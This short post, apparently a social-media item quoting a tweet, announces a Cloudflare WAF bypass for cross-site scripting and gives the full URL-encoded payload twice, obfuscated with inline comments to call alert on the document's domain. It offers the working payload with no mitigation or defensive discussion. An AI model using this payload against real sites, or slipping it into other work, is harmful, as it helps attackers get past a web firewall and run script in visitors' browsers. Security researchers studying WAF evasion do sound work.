A Cloudflare WAF bypass for XSS vulnerability has been discovered. The payload used for the bypass is %2Bself[%2F*foo*%2F'alert'%2F*bar*%2F](self[%2F*foo*%2F'document'%2F*bar*%2F]['domain'])%2F%2F. This bypass allows an attacker to execute malicious JavaScript code on the client-side. More technical details can be found in the tweet. #xss #exploit #poc
Cloudflare WAF Bypass
Payload:
"%2Bself[%2F*foo*%2F'alert'%2F*bar*%2F](self[%2F*foo*%2F'document'%2F*bar*%2F]['domain'])%2F%2F #xss #exploit #poc
— Mr. OS (@ksg93rd) November 7, 2024